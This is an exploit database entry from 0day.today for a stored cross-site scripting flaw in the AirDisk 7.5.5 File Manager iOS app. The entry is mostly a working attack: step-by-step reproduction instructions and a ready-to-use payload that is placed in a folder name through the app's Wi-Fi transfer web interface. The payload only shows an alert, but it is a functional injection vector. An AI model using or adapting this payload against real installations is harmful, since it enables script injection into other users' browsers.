[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

AirDisk 7.5.5 Cross Site Scripting Vulnerability

Author
Chokri Hammedi
Risk
[
Security Risk Medium
]
0day-ID
0day-ID-37952
Category
web applications
Date add
09-09-2022
Platform
iOS
# Exploit Title: AirDisk 7.5.5 File Manager Stored XSS
# Exploit Author: Chokri Hammedi
# Vendor Homepage: https://apps.apple.com/us/developer/felix-yew/id505904424
# Software Link:
https://apps.apple.com/us/app/airdisk-file-manager/id566530748
# Version: 7.5.5
# Tested on: iPhone ios 15.6

1/ Starting the server ( File Transfer > Wi-fi File Transfer )

2/ Go to browser

3/ Enter the address showing on app eg: http://192.168.1.187:8080

4/ Create a folder with the name: rose'"><img src=x
onerror=alert(document.location)>

5/ Refresh.

#  0day.today [2024-06-03]  #